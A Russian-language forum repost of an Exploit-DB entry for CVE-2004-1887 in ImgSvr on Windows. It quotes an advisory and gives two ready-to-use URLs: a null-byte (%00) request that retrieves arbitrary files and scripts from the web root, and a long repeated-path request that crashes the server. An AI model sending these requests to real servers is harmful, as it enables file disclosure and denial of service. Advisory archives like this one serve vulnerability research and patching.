- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 23906
- Проверка EDB
-
- Пройдено
- Автор
- DONATO FERRANTE
- Тип уязвимости
- REMOTE
- Платформа
- WINDOWS
- CVE
- cve-2004-1887
- Дата публикации
- 2004-04-01
Код:
source: https://www.securityfocus.com/bid/10027/info
A vulnerability has been reported in the ImgSvr server software that may allow a remote user to the retrieve arbitrary files from the web server root directory and any subdirectories therein.
An attacker may leverage this issue to gain access to arbitrary scripts contained within the server root directory.
http://www.example.org:1234/someDirectory/fileName%00
The following has been reported to crash the affected server:
http://127.0.0.1:1234/%00/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/- Источник
- www.exploit-db.com
